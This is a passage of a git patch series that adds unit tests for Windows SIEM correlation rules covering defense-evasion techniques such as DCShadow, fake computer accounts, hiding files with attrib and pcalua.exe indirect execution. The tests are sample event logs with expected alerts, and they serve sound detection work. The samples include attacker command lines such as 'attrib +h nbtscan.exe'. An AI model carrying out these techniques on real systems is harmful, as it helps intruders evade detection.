"dc1.insecurebank.local", "event_src.host": "dc1.insecurebank.local", "event_src.hostname": "dc1", "event_src.subsys": "Security", "event_src.title": "windows", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_4742_A_computer_account_was_changed", "importance": "low", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "4742", "normalized": true, "object": "account", "object.account.domain": "insecurebank", "object.account.id": "S-1-5-21-738609754-2819869699-4189121830-1120", "object.account.name": "alice$", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-01T17:17:32.832Z", "status": "success", "subject": "account", "subject.account.domain": "insecurebank", "subject.account.id": "S-1-5-21-738609754-2819869699-4189121830-500", "subject.account.name": "administrator", "subject.account.session_id": "68724475", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-05-08T03:00:37.586Z", "type": "raw", "uuid": "69cc2855-b059-4b81-8290-55bbb8bd5595"} # Тут будет твой тест. В секции expect укажи сколько и каких корреляционных событий ты ожидаешь -expect 1 {"action": "modify", "alert.context": "e3514235-4b06-11d1-ab04-00c04fc2dcd2/ae9a3b29-01d1-4851-8ca8-e49cd3985e5b/insecurebank.local", "category.generic": "Attack", "category.high": "Defense Evasion", "category.low": "Rogue Domain Controller", "correlation_name": "DCShadow_Attack", "correlation_type": "incident", "datafield2": "host/alice.insecurebank.local restrictedkrbhost/alice.insecurebank.local host/alice restrictedkrbhost/alice termsrv/alice.insecurebank.local termsrv/alice wsman/alice.insecurebank.local wsman/alice gc/alice.insecurebank.local/insecurebank.local e3514235-4b06-11d1-ab04-00c04fc2dcd2/ae9a3b29-01d1-4851-8ca8-e49cd3985e5b/insecurebank.local", "event_src.host": "dc1.insecurebank.local", "event_src.hostname": "dc1", "importance": "high", "object": "account", "object.account.domain": "insecurebank", "object.account.id": "S-1-5-21-738609754-2819869699-4189121830-1120", "object.account.name": "alice$", "status": "success", "subject": "account", "subject.account.domain": "insecurebank", "subject.account.id": "S-1-5-21-738609754-2819869699-4189121830-500", "subject.account.name": "administrator", "subject.account.session_id": "68724475"} \ No newline at end of file +expect 1 {"action": "modify", "alert.context": "e3514235-4b06-11d1-ab04-00c04fc2dcd2/ae9a3b29-01d1-4851-8ca8-e49cd3985e5b/insecurebank.local", "category.generic": "Attack", "category.high": "Defense Evasion", "category.low": "Rogue Domain Controller", "correlation_name": "DCShadow_Attack", "correlation_type": "incident", "datafield2": "host/alice.insecurebank.local restrictedkrbhost/alice.insecurebank.local host/alice restrictedkrbhost/alice termsrv/alice.insecurebank.local termsrv/alice wsman/alice.insecurebank.local wsman/alice gc/alice.insecurebank.local/insecurebank.local e3514235-4b06-11d1-ab04-00c04fc2dcd2/ae9a3b29-01d1-4851-8ca8-e49cd3985e5b/insecurebank.local", "event_src.category": "Directory service", "event_src.host": "dc1.insecurebank.local", "event_src.hostname": "dc1", "event_src.subsys": "Security", "event_src.title": "windows", "event_src.vendor": "microsoft", "importance": "high", "incident.category": "UserCompromising", "incident.severity": "high", "object": "account", "object.account.domain": "insecurebank", "object.account.id": "S-1-5-21-738609754-2819869699-4189121830-1120", "object.account.name": "alice$", "status": "success", "subject": "account", "subject.account.domain": "insecurebank", "subject.account.id": "S-1-5-21-738609754-2819869699-4189121830-500", "subject.account.name": "administrator", "subject.account.session_id": "68724475"} + \ No newline at end of file From 7f683b15b8f20984c07d36eafc88ea5924bbf172 Mon Sep 17 00:00:00 2001 From: shadow2033 <135636880+shadow2033@users.noreply.github.com> Date: Mon, 31 Jul 2023 11:02:02 +0300 Subject: [PATCH 19/57] =?UTF-8?q?=D0=94=D0=BE=D0=B1=D0=B0=D0=B2=D0=BB?= =?UTF-8?q?=D0=B5=D0=BD=20=D0=BC=D0=BE=D0=B4=D1=83=D0=BB=D1=8C=D0=BD=D1=8B?= =?UTF-8?q?=D0=B9=20=D1=82=D0=B5=D1=81=D1=82=20=D0=B4=D0=BB=D1=8F=20=D0=BF?= =?UTF-8?q?=D1=80=D0=B0=D0=B2=D0=B8=D0=BB=D0=B0=20(Detect=5FFake=5FCompute?= =?UTF-8?q?rAccount)?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .../Detect_Fake_ComputerAccount/tests/test_1.sc | 4 ++++ 1 file changed, 4 insertions(+) create mode 100644 packages/windows_open_package/correlation_rules/mitre_attck_defense_evasion/Detect_Fake_ComputerAccount/tests/test_1.sc diff --git a/packages/windows_open_package/correlation_rules/mitre_attck_defense_evasion/Detect_Fake_ComputerAccount/tests/test_1.sc b/packages/windows_open_package/correlation_rules/mitre_attck_defense_evasion/Detect_Fake_ComputerAccount/tests/test_1.sc new file mode 100644 index 00000000..ffb1b069 --- /dev/null +++ b/packages/windows_open_package/correlation_rules/mitre_attck_defense_evasion/Detect_Fake_ComputerAccount/tests/test_1.sc @@ -0,0 +1,4 @@ +{"action": "create", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Security-Auditing\",\"Guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\"},\"EventID\":\"4720\",\"Version\":\"0\",\"Level\":\"0\",\"Task\":\"13824\",\"Opcode\":\"0\",\"Keywords\":\"0x8020000000000000\",\"TimeCreated\":{\"SystemTime\":\"2020-09-16T09:31:19.1332724Z\"},\"EventRecordID\":\"769629\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"584\",\"ThreadID\":\"752\"},\"Channel\":\"Security\",\"Computer\":\"01566s-win16-ir.threebeesco.com\",\"Security\":\"\"},\"EventData\":{\"Data\":[{\"Name\":\"TargetUserName\",\"text\":\"$\"},{\"Name\":\"TargetDomainName\",\"text\":\"3B\"},{\"Name\":\"TargetSid\",\"text\":\"S-1-5-21-308926384-506822093-3341789130-107103\"},{\"Name\":\"SubjectUserSid\",\"text\":\"S-1-5-18\"},{\"Name\":\"SubjectUserName\",\"text\":\"01566S-WIN16-IR$\"},{\"Name\":\"SubjectDomainName\",\"text\":\"3B\"},{\"Name\":\"SubjectLogonId\",\"text\":\"0x3e7\"},{\"Name\":\"PrivilegeList\",\"text\":\"-\"},{\"Name\":\"SamAccountName\",\"text\":\"$\"},{\"Name\":\"DisplayName\",\"text\":\"%%1793\"},{\"Name\":\"UserPrincipalName\",\"text\":\"-\"},{\"Name\":\"HomeDirectory\",\"text\":\"%%1793\"},{\"Name\":\"HomePath\",\"text\":\"%%1793\"},{\"Name\":\"ScriptPath\",\"text\":\"%%1793\"},{\"Name\":\"ProfilePath\",\"text\":\"%%1793\"},{\"Name\":\"UserWorkstations\",\"text\":\"%%1793\"},{\"Name\":\"PasswordLastSet\",\"text\":\"%%1794\"},{\"Name\":\"AccountExpires\",\"text\":\"%%1794\"},{\"Name\":\"PrimaryGroupId\",\"text\":\"513\"},{\"Name\":\"AllowedToDelegateTo\",\"text\":\"-\"},{\"Name\":\"OldUacValue\",\"text\":\"0x0\"},{\"Name\":\"NewUacValue\",\"text\":\"0x15\"},{\"Name\":\"UserAccountControl\",\"text\":\"%%2080 %%2082 %%2084\"},{\"Name\":\"UserParameters\",\"text\":\"%%1792\"},{\"Name\":\"SidHistory\",\"text\":\"-\"},{\"Name\":\"LogonHours\",\"text\":\"%%1793\"}]}}}", "category.generic": "Account", "category.high": "Users And Rights Management", "category.low": "Manipulation", "event_src.category": "Operating system", "event_src.fqdn": "01566s-win16-ir.threebeesco.com", "event_src.host": "01566s-win16-ir.threebeesco.com", "event_src.hostname": "01566s-win16-ir", "event_src.subsys": "Security", "event_src.title": "windows", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_4720_A_user_account_was_created", "importance": "medium", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "4720", "normalized": true, "object": "account", "object.account.domain": "3b", "object.account.id": "S-1-5-21-308926384-506822093-3341789130-107103", "object.account.name": "$", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-06T20:07:35.899Z", "status": "success", "subject": "account", "subject.account.domain": "3b", "subject.account.id": "S-1-5-18", "subject.account.name": "01566s-win16-ir$", "subject.account.session_id": "999", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2020-09-16T09:31:19.133Z", "type": "raw", "uuid": "e6dd0caf-b655-4c03-807d-9f91177f7307"} + +# Тут будет твой тест. В секции expect укажи сколько и каких корреляционных событий ты ожидаешь +expect 1 {"action": "create", "category.generic": "Attack", "category.high": "Defense Evasion", "category.low": "Masquerading", "correlation_name": "Detect_Fake_ComputerAccount", "correlation_type": "incident", "event_src.category": "Operating system", "event_src.host": "01566s-win16-ir.threebeesco.com", "event_src.hostname": "01566s-win16-ir", "event_src.subsys": "Security", "event_src.title": "windows", "event_src.vendor": "microsoft", "importance": "low", "incident.aggregation.key": "Detect_Fake_ComputerAccount|$", "incident.category": "Undefined", "incident.severity": "low", "object": "account", "object.account.domain": "3b", "object.account.id": "S-1-5-21-308926384-506822093-3341789130-107103", "object.account.name": "$", "status": "success", "subject": "account", "subject.account.domain": "3b", "subject.account.id": "S-1-5-18", "subject.account.name": "01566s-win16-ir$", "subject.account.session_id": "999"} From 182798816d10371e25dff1d2e5afdba92a67fcf0 Mon Sep 17 00:00:00 2001 From: shadow2033 <135636880+shadow2033@users.noreply.github.com> Date: Mon, 31 Jul 2023 11:07:31 +0300 Subject: [PATCH 20/57] =?UTF-8?q?=D0=94=D0=BE=D0=B1=D0=B0=D0=B2=D0=BB?= =?UTF-8?q?=D0=B5=D0=BD=20=D0=BC=D0=BE=D0=B4=D1=83=D0=BB=D1=8C=D0=BD=D1=8B?= =?UTF-8?q?=D0=B9=20=D1=82=D0=B5=D1=81=D1=82=20=D0=B4=D0=BB=D1=8F=20=D0=BF?= =?UTF-8?q?=D1=80=D0=B0=D0=B2=D0=B8=D0=BB=D0=B0=20(Detect=5Fhiding=5Ffiles?= =?UTF-8?q?=5Fvia=5Fattrib=5Fcmdlet)?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .../Detect_hiding_files_via_attrib_cmdlet/tests/test_1.sc | 5 +++++ 1 file changed, 5 insertions(+) create mode 100644 packages/windows_open_package/correlation_rules/mitre_attck_defense_evasion/Detect_hiding_files_via_attrib_cmdlet/tests/test_1.sc diff --git a/packages/windows_open_package/correlation_rules/mitre_attck_defense_evasion/Detect_hiding_files_via_attrib_cmdlet/tests/test_1.sc b/packages/windows_open_package/correlation_rules/mitre_attck_defense_evasion/Detect_hiding_files_via_attrib_cmdlet/tests/test_1.sc new file mode 100644 index 00000000..293aaed6 --- /dev/null +++ b/packages/windows_open_package/correlation_rules/mitre_attck_defense_evasion/Detect_hiding_files_via_attrib_cmdlet/tests/test_1.sc @@ -0,0 +1,5 @@ +{"action": "start", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-05-19T17:32:00.4829823Z\"},\"EventRecordID\":\"22013\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"1768\",\"ThreadID\":\"2272\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"DC1.insecurebank.local\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\",\"text\":\"technique_id=T1158,technique_name=Hidden Files and DirectoriesHidden Files and Directories\"},{\"Name\":\"UtcTime\",\"text\":\"2019-05-19 17:32:00.478\"},{\"Name\":\"ProcessGuid\",\"text\":\"{dfae8213-9310-5ce1-0000-0010eaba0a00}\"},{\"Name\":\"ProcessId\",\"text\":\"2728\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\attrib.exe\"},{\"Name\":\"FileVersion\",\"text\":\"6.3.9600.16384 (winblue_rtm.130821-1623)\"},{\"Name\":\"Description\",\"text\":\"Attribute Utility\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"CommandLine\",\"text\":\"attrib +h nbtscan.exe\"},{\"Name\":\"CurrentDirectory\",\"text\":\"c:\\\\ProgramData\\\\\"},{\"Name\":\"User\",\"text\":\"insecurebank\\\\Administrator\"},{\"Name\":\"LogonGuid\",\"text\":\"{dfae8213-9133-5ce1-0000-0020cc660500}\"},{\"Name\":\"LogonId\",\"text\":\"0x566cc\"},{\"Name\":\"TerminalSessionId\",\"text\":\"2\"},{\"Name\":\"IntegrityLevel\",\"text\":\"High\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=B71C1331AC5FA214076E5CD5C885712447057B96,MD5=116D463D2F5DBF76F7E2F5C6D8B5D3BB,SHA256=EBE94E294D86C714BED13EF018E70F75C37F8D8259144C0C847637EDC0222ECB,IMPHASH=461A33302E82ED68F1A74C083E27BD02\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{dfae8213-91cc-5ce1-0000-0010bef40600}\"},{\"Name\":\"ParentProcessId\",\"text\":\"3408\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\cmd.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"\\\"C:\\\\Windows\\\\system32\\\\cmd.exe\\\"\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "dfae8213-9133-5ce1-0000-0020cc660500", "event_src.category": "Other", "event_src.fqdn": "dc1.insecurebank.local", "event_src.host": "dc1.insecurebank.local", "event_src.hostname": "dc1", "event_src.rule": "technique_id=T1158,technique_name=Hidden Files and DirectoriesHidden Files and Directories", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "insecurebank", "object.account.id": "synthetic:administrator@insecurebank", "object.account.name": "administrator", "object.account.privileges": "High", "object.account.session_id": "353996", "object.process.cmdline": "attrib +h nbtscan.exe", "object.process.cwd": "c:\\ProgramData\\", "object.process.fullpath": "c:\\windows\\system32\\attrib.exe", "object.process.guid": "dfae8213-9310-5ce1-0000-0010eaba0a00", "object.process.hash.imphash": "461A33302E82ED68F1A74C083E27BD02", "object.process.hash.md5": "116D463D2F5DBF76F7E2F5C6D8B5D3BB", "object.process.hash.sha1": "B71C1331AC5FA214076E5CD5C885712447057B96", "object.process.hash.sha256": "EBE94E294D86C714BED13EF018E70F75C37F8D8259144C0C847637EDC0222ECB", "object.process.id": "2728", "object.process.meta": "Description:Attribute Utility | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "attrib.exe", "object.process.parent.cmdline": "\"C:\\Windows\\system32\\cmd.exe\"", "object.process.parent.fullpath": "c:\\windows\\system32\\cmd.exe", "object.process.parent.guid": "dfae8213-91cc-5ce1-0000-0010bef40600", "object.process.parent.id": "3408", "object.process.parent.name": "cmd.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "6.3.9600.16384 (winblue_rtm.130821-1623)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-16T20:20:55.786Z", "status": "success", "subject": "account", "subject.account.domain": "insecurebank", "subject.account.id": "synthetic:administrator@insecurebank", "subject.account.name": "administrator", "subject.account.privileges": "High", "subject.account.session_id": "353996", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-05-19T17:32:00.478Z", "type": "raw", "uuid": "df5ffb59-a986-4363-a249-12900323391d"} + +# Тут будет твой тест. В секции expect укажи сколько и каких корреляционных событий ты ожидаешь +expect 1 {"action": "start", "category.generic": "Attack", "category.high": "Defence Evasion", "category.low": "Hide Artifacts: Hidden Files and Directories", "correlation_name": "Detect_hiding_files_via_attrib_cmdlet", "correlation_type": "event", "event_src.fqdn": "dc1.insecurebank.local", "event_src.host": "dc1.insecurebank.local", "event_src.hostname": "dc1", "event_src.rule": "technique_id=T1158,technique_name=Hidden Files and DirectoriesHidden Files and Directories", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "importance": "medium", "incident.aggregation.key": "Detect_hiding_files_via_attrib_cmdlet|dc1.insecurebank.local|attrib +h nbtscan.exe", "incident.aggregation.timeout": 7200, "incident.category": "Undefined", "incident.severity": "medium", "object": "service", "object.account.domain": "insecurebank", "object.account.id": "synthetic:administrator@insecurebank", "object.account.name": "administrator", "object.account.session_id": "353996", "object.process.cmdline": "attrib +h nbtscan.exe", "object.process.cwd": "c:\\ProgramData\\", "object.process.fullpath": "c:\\windows\\system32\\attrib.exe", "object.process.guid": "dfae8213-9310-5ce1-0000-0010eaba0a00", "object.process.hash.md5": "116D463D2F5DBF76F7E2F5C6D8B5D3BB", "object.process.hash.sha1": "B71C1331AC5FA214076E5CD5C885712447057B96", "object.process.hash.sha256": "EBE94E294D86C714BED13EF018E70F75C37F8D8259144C0C847637EDC0222ECB", "object.process.id": "2728", "object.process.meta": "Description:Attribute Utility | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "attrib.exe", "object.process.parent.cmdline": "\"C:\\Windows\\system32\\cmd.exe\"", "object.process.parent.fullpath": "c:\\windows\\system32\\cmd.exe", "object.process.parent.guid": "dfae8213-91cc-5ce1-0000-0010bef40600", "object.process.parent.id": "3408", "object.process.parent.name": "cmd.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "6.3.9600.16384 (winblue_rtm.130821-1623)", "status": "success", "subject": "account", "subject.account.domain": "insecurebank", "subject.account.id": "synthetic:administrator@insecurebank", "subject.account.name": "administrator", "subject.account.privileges": "High", "subject.account.session_id": "353996"} + \ No newline at end of file From bd446318fb0a0ba0d55b65fc15fcfd6224bff3d2 Mon Sep 17 00:00:00 2001 From: shadow2033 <135636880+shadow2033@users.noreply.github.com> Date: Mon, 31 Jul 2023 11:18:01 +0300 Subject: [PATCH 21/57] =?UTF-8?q?=D0=A0=D0=B0=D1=81=D1=88=D0=B8=D1=80?= =?UTF-8?q?=D0=B8=D0=BB=20=D0=BF=D0=BE=D0=BB=D1=8F=20=D0=B4=D0=B0=D0=BD?= =?UTF-8?q?=D0=BD=D1=8B=D1=85=20=D0=BA=D0=BE=D1=82=D0=BE=D1=80=D1=8B=D0=B5?= =?UTF-8?q?=20=D0=BC=D1=8B=20=D0=BE=D0=B6=D0=B8=D0=B4=D0=B0=D0=B5=D0=BC=20?= =?UTF-8?q?=D0=B4=D0=BB=D1=8F=20=D0=BF=D1=80=D0=B0=D0=B2=D0=B8=D0=BB=D0=B0?= =?UTF-8?q?=20(Detect=5Flolbin=5Fpcalua=5Fexec)?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .../Detect_lolbin_pcalua_exec/tests/test_1.sc | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/packages/windows_open_package/correlation_rules/mitre_attck_defense_evasion/Detect_lolbin_pcalua_exec/tests/test_1.sc b/packages/windows_open_package/correlation_rules/mitre_attck_defense_evasion/Detect_lolbin_pcalua_exec/tests/test_1.sc index a8fc81db..eff45bf3 100644 --- a/packages/windows_open_package/correlation_rules/mitre_attck_defense_evasion/Detect_lolbin_pcalua_exec/tests/test_1.sc +++ b/packages/windows_open_package/correlation_rules/mitre_attck_defense_evasion/Detect_lolbin_pcalua_exec/tests/test_1.sc @@ -2,4 +2,4 @@ {"action": "start", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-05-12T17:01:51.0079509Z\"},\"EventRecordID\":\"16498\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"2012\",\"ThreadID\":\"300\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"IEWIN7\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2019-05-12 17:01:50.852\"},{\"Name\":\"ProcessGuid\",\"text\":\"{365abb72-517e-5cd8-0000-00105fe01700}\"},{\"Name\":\"ProcessId\",\"text\":\"2920\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\calc.exe\"},{\"Name\":\"FileVersion\",\"text\":\"6.1.7600.16385 (win7_rtm.090713-1255)\"},{\"Name\":\"Description\",\"text\":\"Windows Calculator\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"CommandLine\",\"text\":\"\\\"C:\\\\Windows\\\\system32\\\\calc.exe\\\"\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Users\\\\IEUser\\\\\"},{\"Name\":\"User\",\"text\":\"IEWIN7\\\\IEUser\"},{\"Name\":\"LogonGuid\",\"text\":\"{365abb72-4fb5-5cd8-0000-0020f2350100}\"},{\"Name\":\"LogonId\",\"text\":\"0x135f2\"},{\"Name\":\"TerminalSessionId\",\"text\":\"1\"},{\"Name\":\"IntegrityLevel\",\"text\":\"Medium\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=9018A7D6CDBE859A430E8794E73381F77C840BE0,MD5=60B7C0FEAD45F2066E5B805A91F4F0FC,SHA256=80C10EE5F21F92F89CBC293A59D2FD4C01C7958AACAD15642558DB700943FA22,IMPHASH=F93B5D76132F6E6068946EC238813CE1\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{365abb72-517e-5cd8-0000-001024d61700}\"},{\"Name\":\"ParentProcessId\",\"text\":\"2952\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\pcalua.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"\\\"C:\\\\Windows\\\\System32\\\\pcalua.exe\\\" -a c:\\\\Windows\\\\system32\\\\calc.exe\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "365abb72-4fb5-5cd8-0000-0020f2350100", "event_src.category": "Other", "event_src.fqdn": "iewin7", "event_src.host": "iewin7", "event_src.hostname": "iewin7", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "iewin7", "object.account.id": "synthetic:ieuser@iewin7", "object.account.name": "ieuser", "object.account.privileges": "Medium", "object.account.session_id": "79346", "object.process.cmdline": "\"C:\\Windows\\system32\\calc.exe\"", "object.process.cwd": "C:\\Users\\IEUser\\", "object.process.fullpath": "c:\\windows\\system32\\calc.exe", "object.process.guid": "365abb72-517e-5cd8-0000-00105fe01700", "object.process.hash.imphash": "F93B5D76132F6E6068946EC238813CE1", "object.process.hash.md5": "60B7C0FEAD45F2066E5B805A91F4F0FC", "object.process.hash.sha1": "9018A7D6CDBE859A430E8794E73381F77C840BE0", "object.process.hash.sha256": "80C10EE5F21F92F89CBC293A59D2FD4C01C7958AACAD15642558DB700943FA22", "object.process.id": "2920", "object.process.meta": "Description:Windows Calculator | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "calc.exe", "object.process.parent.cmdline": "\"C:\\Windows\\System32\\pcalua.exe\" -a c:\\Windows\\system32\\calc.exe", "object.process.parent.fullpath": "c:\\windows\\system32\\pcalua.exe", "object.process.parent.guid": "365abb72-517e-5cd8-0000-001024d61700", "object.process.parent.id": "2952", "object.process.parent.name": "pcalua.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "6.1.7600.16385 (win7_rtm.090713-1255)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-18T11:57:05.702Z", "status": "success", "subject": "account", "subject.account.domain": "iewin7", "subject.account.id": "synthetic:ieuser@iewin7", "subject.account.name": "ieuser", "subject.account.privileges": "Medium", "subject.account.session_id": "79346", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-05-12T17:01:50.852Z", "type": "raw", "uuid": "a3e0c4e1-5d29-49ce-a9b5-01ff83ea0341"} # Тут будет твой тест. В секции expect укажи сколько и каких корреляционных событий ты ожидаешь -expect 1 {"correlation_name": "Detect_lolbin_pcalua_exec"} +expect 1 {"action": "start", "category.generic": "Attack", "category.high": "Defense Evasion", "category.low": "Indirect Command Execution", "correlation_name": "Detect_lolbin_pcalua_exec", "correlation_type": "incident", "event_src.fqdn": "iewin7", "event_src.host": "iewin7", "event_src.hostname": "iewin7", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "importance": "medium", "incident.aggregation.key": "Detect_lolbin_pcalua_exec|iewin7|\"c:\\windows\\system32\\pcalua.exe\" -a c:\\windows\\system32\\calc.exe", "incident.aggregation.timeout": 7200, "incident.category": "Undefined", "incident.severity": "medium", "object": "process", "object.account.domain": "iewin7", "object.account.id": "synthetic:ieuser@iewin7", "object.account.name": "ieuser", "object.account.session_id": "79346", "object.process.cmdline": "\"C:\\Windows\\System32\\pcalua.exe\" -a c:\\Windows\\system32\\calc.exe", "object.process.cwd": "C:\\Users\\IEUser\\", "object.process.fullpath": "c:\\windows\\system32\\pcalua.exe", "object.process.guid": "365abb72-517e-5cd8-0000-001024d61700", "object.process.hash.md5": "D652BA887500816431566B524292ECCB", "object.process.hash.sha1": "ABB6319976D9702E0C80978D51C0AEE88A33D201", "object.process.hash.sha256": "65446AF2997779DB6CDAEFB2ABC2994CA9F2A2477C882BC3A5F828BBFFB83CEE", "object.process.id": "2952", "object.process.meta": "Description:Program Compatibility Assistant | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "pcalua.exe", "object.process.parent.cmdline": "\"C:\\Windows\\system32\\cmd.exe\"", "object.process.parent.fullpath": "c:\\windows\\system32\\cmd.exe", "object.process.parent.guid": "365abb72-516b-5cd8-0000-001087e41600", "object.process.parent.id": "3788", "object.process.parent.name": "cmd.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "6.1.7600.16385 (win7_rtm.090713-1255)", "status": "success", "subject": "account", "subject.account.domain": "iewin7", "subject.account.id": "synthetic:ieuser@iewin7", "subject.account.name": "ieuser", "subject.account.privileges": "Medium", "subject.account.session_id": "79346"} \ No newline at end of file From c25f5388bc3fa310269ba4a249c7db95460a4b4b Mon Sep 17 00:00:00 2001 From: shadow2033 <135636880+shadow2033@users.noreply.github.com> Date: Mon, 31 Jul 2023 11:23:56 +0300 Subject: [PATCH 22/57] =?UTF-8?q?=D0=94=D0=BE=D0=B1=D0=B0=D0=B2=D0=BB?= =?UTF-8?q?=D0=B5=D0=BD=20=D0=BC=D0=BE=D0=B4=D1=83=D0=BB=D1=8C=D0=BD=D1=8B?= =?UTF-8?q?=D0=B9=20=D1=82=D0=B5=D1=81=D1=82=20=D0=B4=D0=BB=D1=8F=20=D0=BF?= =?UTF-8?q?=D1=80=D0=B0=D0=B2=D0=B8=D0=BB=D0=B0=20(ImageLoad=5Ffrom=5FNetw?= =?UTF-8?q?ork=5FShare=5Fto=5FLSASS)?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .../ImageLoad_from_Network_Share_to_LSASS/tests/test_1.sc | 4 ++++ 1 file changed, 4 insertions(+) create mode 100644 packages/windows_open_package/correlation_rules/mitre_attck_defense_evasion/ImageLoad_from_Network_Share_to_LSASS/tests/test_1.sc diff --git a/packages/windows_open_package/correlation_rules/mitre_attck_defense_evasion/ImageLoad_from_Network_Share_to_LSASS/tests/test_1.sc b/packages/windows_open_package/correlation_rules/mitre_attck_defense_evasion/ImageLoad_from_Network_Share_to_LSASS/tests/test_1.sc new file mode 100644 index 00000000..73a7c96c --- /dev/null +++ b/packages/windows_open_package/correlation_rules/mitre_attck_defense_evasion/ImageLoad_from_Network_Share_to_LSASS/tests/test_1.sc @@ -0,0 +1,4 @@ +{"action": "start", "body": 